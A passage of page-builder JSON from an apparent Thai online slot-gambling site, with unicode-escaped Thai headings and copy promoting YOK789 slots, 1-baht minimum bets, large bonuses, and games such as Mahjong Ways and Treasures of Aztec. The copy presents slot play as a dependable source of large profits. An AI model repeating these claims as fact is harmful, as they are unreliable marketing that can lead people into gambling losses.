\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec 